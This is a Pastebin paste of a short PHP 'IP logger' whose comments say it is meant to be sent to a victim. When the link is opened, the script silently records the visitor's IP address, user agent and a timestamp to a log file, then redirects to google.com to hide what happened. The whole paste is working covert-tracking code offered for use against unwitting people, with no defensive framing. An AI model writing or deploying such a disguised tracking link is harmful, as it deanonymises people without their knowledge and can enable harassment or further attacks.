Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- By:sH@rk-Dz
- SImple php Script easly to get ip & os & more things
- after send him to any person & open it this will riderct to google
- and generat txt file called ip_Log.txt insdime himwill see you victume ( ip) :)
- */
- $creat = fopen ('ip_Log.txt','a');
- $date = date (" Y-m-d-M-h:i |");
- $ip = $_SERVER['REMOTE_ADDR']."|".$_SERVER['HTTP_USER_AGENT'];
- $edite = fwrite($creat,$date."". $ip ."\n\n");
- fclose ($creat);
- header ("location: http://google.com");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement